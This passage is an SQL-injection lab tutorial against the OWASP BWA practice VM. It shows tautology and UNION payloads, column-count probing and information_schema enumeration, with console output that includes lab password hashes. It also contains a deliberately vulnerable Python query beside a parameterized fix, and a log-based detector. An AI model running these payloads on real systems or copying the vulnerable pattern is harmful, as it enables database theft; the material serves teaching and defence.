SQL injection: obtaining database data through an injection point vulnerability (Kali, sqlmap)
0. Logging in to the target VM's MySQL
# mysql -uroot -powaspbwa
1. Categories of SQL injection
Manual injection and automated injection with tools
2. Two important SQL query forms
1). or where 1=1  # only returns rows from the one table the original statement already queries
2). union query  # builds a combined query that can read from several tables
3. Things to note about UNION queries
1). The SELECT statements before and after UNION must have the same number of columns; a numeric literal can stand in for any column
2). The result can show the first table's values or the second table's
3). A UNION query can be used to guess how many columns the first SELECT statement has
4. Building simple SQL injection statements
1) Building the statement with or 1=1:
mysql> select * from dvwa.users limit 2;
+---------+------------+-----------+---------+----------------------------------+--------------------------------------------------+
| user_id | first_name | last_name | user | password | avatar |
+---------+------------+-----------+---------+----------------------------------+--------------------------------------------------+
| 1 | admin | admin | admin | 21232f297a57a5a743894a0e4a801fc3 | http://127.0.0.1/dvwa/hackable/users/admin.jpg |
| 2 | Gordon | Brown | gordonb | e99a18c428cb38d5f260853678922e03 | http://127.0.0.1/dvwa/hackable/users/gordonb.jpg |
+---------+------------+-----------+---------+----------------------------------+--------------------------------------------------+
mysql> select user_id,first_name,last_name from dvwa.users where first_name='yangge';
Empty set (0.00 sec)
mysql> select user_id,first_name,last_name from dvwa.users where first_name='yangge' or 1=1 limit 2;
+---------+------------+-----------+
| user_id | first_name | last_name |
+---------+------------+-----------+
| 1 | admin | admin |
| 2 | Gordon | Brown |
+---------+------------+-----------+
2). UNION query: the SELECT statements before and after UNION must have the same number of columns, and a numeric literal can stand in for any column; the result can show the first table's values or the second table's
(1). The displayed column names come from the first table, and so do the displayed values
mysql> select user,password from mysql.user limit 2;
+------+-------------------------------------------+
| user | password |
+------+-------------------------------------------+
| root | *73316569DAC7839C2A784FF263F5C0ABBC7086E2 |
| root | *D5D9F81F5542DE067FFF5FF7A4CA4BDD322C578F |
+------+-------------------------------------------+
mysql> select user_login,user_pass from wordpress.wp_users limit 2;
+------------+----------------------------------+
| user_login | user_pass |
+------------+----------------------------------+
| admin | 21232f297a57a5a743894a0e4a801fc3 |
| user | ee11cbb19052e40b07aac0ca060c23ee |
+------------+----------------------------------+
mysql> select user,password from mysql.user union select user_login,1 from wordpress.wp_users limit 2;
+------+-------------------------------------------+
| user | password |
+------+-------------------------------------------+
| root | *73316569DAC7839C2A784FF263F5C0ABBC7086E2 |
| root | *D5D9F81F5542DE067FFF5FF7A4CA4BDD322C578F |
+------+-------------------------------------------+
(2). The displayed column names come from the first table, but the displayed values come from the second table: use where 1=2 to give the first SELECT a condition that is always false
mysql> select user,password,host from mysql.user limit 2;
+------+-------------------------------------------+---------------+
| user | password | host |
+------+-------------------------------------------+---------------+
| root | *73316569DAC7839C2A784FF263F5C0ABBC7086E2 | localhost |
| root | *D5D9F81F5542DE067FFF5FF7A4CA4BDD322C578F | brokenwebapps |
+------+-------------------------------------------+---------------+
mysql> select user_login,user_pass,user_nicename from wordpress.wp_users limit 2;
+------------+----------------------------------+---------------+
| user_login | user_pass | user_nicename |
+------------+----------------------------------+---------------+
| admin | 21232f297a57a5a743894a0e4a801fc3 | admin |
| user | ee11cbb19052e40b07aac0ca060c23ee | user |
+------------+----------------------------------+---------------+
mysql> select user,password,host from mysql.user where 1=2 union select user_login,user_pass,1 from wordpress.wp_users limit 2;
+-------+----------------------------------+------+
| user | password | host |
+-------+----------------------------------+------+
| admin | 21232f297a57a5a743894a0e4a801fc3 | 1 |
| user | ee11cbb19052e40b07aac0ca060c23ee | 1 |
+-------+----------------------------------+------+
(3). Using a UNION query to guess the number of columns in the first SELECT and then read that table's data
Build UNION queries to find out how many columns the unknown table dvwa.users has (6 columns) and display its contents:
mysql> select * from dvwa.users;
+---------+------------+-----------+---------+----------------------------------+--------------------------------------------------+
| user_id | first_name | last_name | user | password | avatar |
+---------+------------+-----------+---------+----------------------------------+--------------------------------------------------+
| 1 | admin | admin | admin | 21232f297a57a5a743894a0e4a801fc3 | http://127.0.0.1/dvwa/hackable/users/admin.jpg |
| 2 | Gordon | Brown | gordonb | e99a18c428cb38d5f260853678922e03 | http://127.0.0.1/dvwa/hackable/users/gordonb.jpg |
| 3 | Hack | Me | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b | http://127.0.0.1/dvwa/hackable/users/1337.jpg |
| 4 | Pablo | Picasso | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 | http://127.0.0.1/dvwa/hackable/users/pablo.jpg |
| 5 | Bob | Smith | smithy | 5f4dcc3b5aa765d61d8327deb882cf99 | http://127.0.0.1/dvwa/hackable/users/smithy.jpg |
| 6 | user | user | user | ee11cbb19052e40b07aac0ca060c23ee | http://127.0.0.1/dvwa/hackable/users/1337.jpg |
+---------+------------+-----------+---------+----------------------------------+--------------------------------------------------+
mysql> select * from dvwa.users union select 1;
ERROR 1222 (21000): The used SELECT statements have a different number of columns
mysql> select * from dvwa.users union select 1,2;
ERROR 1222 (21000): The used SELECT statements have a different number of columns
mysql> select * from dvwa.users union select 1,2,3;
ERROR 1222 (21000): The used SELECT statements have a different number of columns
mysql> select * from dvwa.users union select 1,2,3,4;
ERROR 1222 (21000): The used SELECT statements have a different number of columns
mysql> select * from dvwa.users union select 1,2,3,4,5;
ERROR 1222 (21000): The used SELECT statements have a different number of columns
mysql> select * from dvwa.users union select 1,2,3,4,5,6;
+---------+------------+-----------+---------+----------------------------------+--------------------------------------------------+
| user_id | first_name | last_name | user | password | avatar |
+---------+------------+-----------+---------+----------------------------------+--------------------------------------------------+
| 1 | admin | admin | admin | 21232f297a57a5a743894a0e4a801fc3 | http://127.0.0.1/dvwa/hackable/users/admin.jpg |
| 2 | Gordon | Brown | gordonb | e99a18c428cb38d5f260853678922e03 | http://127.0.0.1/dvwa/hackable/users/gordonb.jpg |
| 3 | Hack | Me | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b | http://127.0.0.1/dvwa/hackable/users/1337.jpg |
| 4 | Pablo | Picasso | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 | http://127.0.0.1/dvwa/hackable/users/pablo.jpg |
| 5 | Bob | Smith | smithy | 5f4dcc3b5aa765d61d8327deb882cf99 | http://127.0.0.1/dvwa/hackable/users/smithy.jpg |
| 6 | user | user | user | ee11cbb19052e40b07aac0ca060c23ee | http://127.0.0.1/dvwa/hackable/users/1337.jpg |
| 1 | 2 | 3 | 4 | 5 | 6 |
+---------+------------+-----------+---------+----------------------------------+--------------------------------------------------+
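All three cases above only work because the application splices the request value into the query text. As an added example that is not part of the original notes, the following Python uses sqlite3 as an offline stand-in for MySQL (assumption: the constructed tables mirror the dvwa.users and wp_users rows shown) and runs the same or 1=1 and union payloads against a concatenated query and against a parameterized one; the trailing '1'='1 replaces the MySQL # comment terminator, which sqlite does not accept.

```python
import sqlite3

# Constructed in-memory stand-in for the dvwa.users and wordpress.wp_users
# tables seen above (sqlite3 replaces MySQL so the example runs offline).
SCHEMA = """
CREATE TABLE users(user_id INTEGER, first_name TEXT, last_name TEXT);
INSERT INTO users VALUES (1, 'admin', 'admin'), (2, 'Gordon', 'Brown');
CREATE TABLE wp_users(user_login TEXT, user_pass TEXT);
INSERT INTO wp_users VALUES
  ('admin', '21232f297a57a5a743894a0e4a801fc3'),
  ('user',  'ee11cbb19052e40b07aac0ca060c23ee');
"""

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn

def lookup_vulnerable(conn, first_name):
    """String concatenation: the input is parsed as part of the SQL grammar,
    so a quote in the input closes the literal and the rest becomes SQL."""
    sql = ("select user_id, first_name, last_name from users "
           "where first_name='" + first_name + "'")
    return sorted(conn.execute(sql).fetchall(), key=repr)

def lookup_safe(conn, first_name):
    """Bound parameter: the driver sends the input as data, so the quote,
    'or 1=1' and 'union select' are compared literally against first_name."""
    sql = ("select user_id, first_name, last_name from users "
           "where first_name=?")
    return sorted(conn.execute(sql, (first_name,)).fetchall(), key=repr)

# The two payload shapes from the notes above. The trailing '1'='1 stands in
# for the MySQL '#' comment terminator, which sqlite does not understand.
TAUTOLOGY = "yangge' or '1'='1"
UNION_READ = ("yangge' union select user_login, user_pass, 1 "
              "from wp_users where '1'='1")

if __name__ == "__main__":
    db = make_db()
    print("vulnerable / tautology:", lookup_vulnerable(db, TAUTOLOGY))
    print("vulnerable / union:    ", lookup_vulnerable(db, UNION_READ))
    print("safe / tautology:      ", lookup_safe(db, TAUTOLOGY))
    print("safe / union:          ", lookup_safe(db, UNION_READ))
```

The parameterized form returns nothing for either payload because no user is literally named `yangge' or '1'='1`; the column-count and where 1=2 tricks from the notes have no effect on it.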
5. The data dictionary
1). Overview of the data dictionary
It holds the metadata for every database, every table and every column on the server.
This database stores no row data, only information about which databases, tables and columns exist; it is called the data dictionary, and the database is information_schema.
2). Common data-dictionary queries
List every database name and table name on the server:
mysql> select * from information_schema.tables\G #in the result, TABLE_SCHEMA: xx is the database name and TABLE_NAME: xx is the table name
List only the database names, deduplicated:
mysql> select distinct table_schema from information_schema.tables;
List only the table names, deduplicated:
mysql> select distinct table_name from information_schema.tables;
List all tables of one database (the mysql database):
mysql> select table_schema,table_name from information_schema.tables where table_schema='mysql';
Grouped query: which tables each database contains:
mysql> select table_schema,group_concat(table_name) from information_schema.tables group by table_schema\G
The following is the important part:
List every database name, table name and column name on the server:
mysql> select * from information_schema.columns limit 2\G
TABLE_SCHEMA: information_schema #database name
TABLE_NAME: CHARACTER_SETS #table name
COLUMN_NAME: CHARACTER_SET_NAME #column (field) name
List every database name, deduplicated:
mysql> select distinct table_schema from information_schema.columns;
List every table name, deduplicated:
mysql> select distinct table_name from information_schema.columns;
List all tables of one database (the mysql database), deduplicated:
mysql> select distinct table_schema,table_name from information_schema.columns where table_schema='mysql';
Grouped query: which tables each database contains:
mysql> select table_schema,group_concat(table_name) from information_schema.columns group by table_schema\G
List every column name on the server:
mysql> select column_name from information_schema.columns;
List all column names of one table in one database (the user table of the mysql database):
mysql> select column_name from information_schema.columns where table_schema='mysql' and table_name='user';
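The data-dictionary queries above are exactly what shows up in the server's query log when an injection point is being worked from the application's connection: the numeric column-count probes from section 4 first, then reads of information_schema.tables and information_schema.columns. As an added example (not from the original notes), this Python flags those three shapes in constructed MySQL general_log text lines; the log line format, thread ids and queries are assumptions built for the example.

```python
import re

# Constructed sample in the shape of MySQL general_log text output
# ("YYMMDD HH:MM:SS <thread id> <command> <argument>"); assumed format.
SAMPLE_LOG = """\
170301 10:15:01    7 Connect   dvwa@localhost on dvwa
170301 10:15:02    7 Query     select first_name,last_name from users where user_id = '2'
170301 10:15:09    7 Query     select first_name,last_name from users where user_id = '2' or 1=1
170301 10:15:11    7 Query     select first_name,last_name from users where user_id = '2' union select 1,2
170301 10:15:12    7 Query     select first_name,last_name from users where user_id = '2' union select 1,2,3
170301 10:15:20    7 Query     select first_name,last_name from users where user_id = '2' union select table_schema,table_name from information_schema.tables
170301 10:15:40   12 Query     select table_name from information_schema.tables where table_schema='dvwa'
170301 10:15:41   12 Quit
"""

LINE_RE = re.compile(r"^\d{6} [\d:]{8}\s+(\d+) (\w+)\s*(.*)$")

# One rule per probe shape shown in the notes: tautology, numeric-literal
# column-count probe, and enumeration of the data dictionary.
RULES = [
    ("tautology", re.compile(r"\bor\s+1\s*=\s*1\b", re.I)),
    ("union_column_probe",
     re.compile(r"\bunion\s+(all\s+)?select\s+\d+(\s*,\s*\d+)*\s*$", re.I)),
    ("schema_enumeration",
     re.compile(r"\binformation_schema\.(tables|columns)\b", re.I)),
]

def parse_general_log(text):
    """Yield (thread_id, command, argument) for each well-formed line."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield int(m.group(1)), m.group(2), m.group(3)

def find_injection_probes(text, app_threads=None):
    """Return (thread_id, rule_name, query) hits for Query entries.
    If app_threads is given, only those connections (the web application's
    DB account) are inspected, so a DBA reading information_schema by hand
    does not raise an alert."""
    hits = []
    for tid, cmd, arg in parse_general_log(text):
        if cmd != "Query" or (app_threads is not None and tid not in app_threads):
            continue
        for name, pat in RULES:
            if pat.search(arg):
                hits.append((tid, name, arg))
    return hits
```

Restricting the scan to the application's connections matters: information_schema reads are routine for administrators, but the web application's account normally has no reason to issue them, and in the notes above it can only do so because it also holds read access to mysql.user.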
3). Examples of querying the data dictionary
List every database name, table name and column name on the server:
mysql> select * from information_schema.columns limit 2\G
*************************** 1. row ***************************
TABLE_CATALOG: NULL
TABLE_SCHEMA: information_schema #database name
TABLE_NAME: CHARACTER_SETS #table name
COLUMN_NAME: CHARACTER_SET_NAME #column (field) name
ORDINAL_POSITION: 1
COLUMN_DEFAULT:
IS_NULLABLE: NO
DATA_TYPE: varchar
CHARACTER_MAXIMUM_LENGTH: 32
CHARACTER_OCTET_LENGTH: 96
NUMERIC_PRECISION: NULL
NUMERIC_SCALE: NULL
CHARACTER_SET_NAME: utf8
COLLATION_NAME: utf8_general_ci
COLUMN_TYPE: varchar(32)
COLUMN_KEY:
EXTRA:
PRIVILEGES: select
COLUMN_COMMENT:
*************************** 2. row ***************************
TABLE_CATALOG: NULL
TABLE_SCHEMA: information_schema
TABLE_NAME: CHARACTER_SETS
COLUMN_NAME: DEFAULT_COLLATE_NAME
ORDINAL_POSITION: 2
COLUMN_DEFAULT:
IS_NULLABLE: NO
DATA_TYPE: varchar
CHARACTER_MAXIMUM_LENGTH: 32
CHARACTER_OCTET_LENGTH: 96
NUMERIC_PRECISION: NULL
NUMERIC_SCALE: NULL
CHARACTER_SET_NAME: utf8
COLLATION_NAME: utf8_general_ci
COLUMN_TYPE: varchar(32)
COLUMN_KEY:
EXTRA:
PRIVILEGES: select
COLUMN_COMMENT:
List every database name, deduplicated:
mysql> select distinct table_schema from information_schema.columns limit 15;
+--------------------+
| table_schema |
+--------------------+
| information_schema |
| bricks |
| bwapp |
| citizens |
| cryptomg |
| dvwa |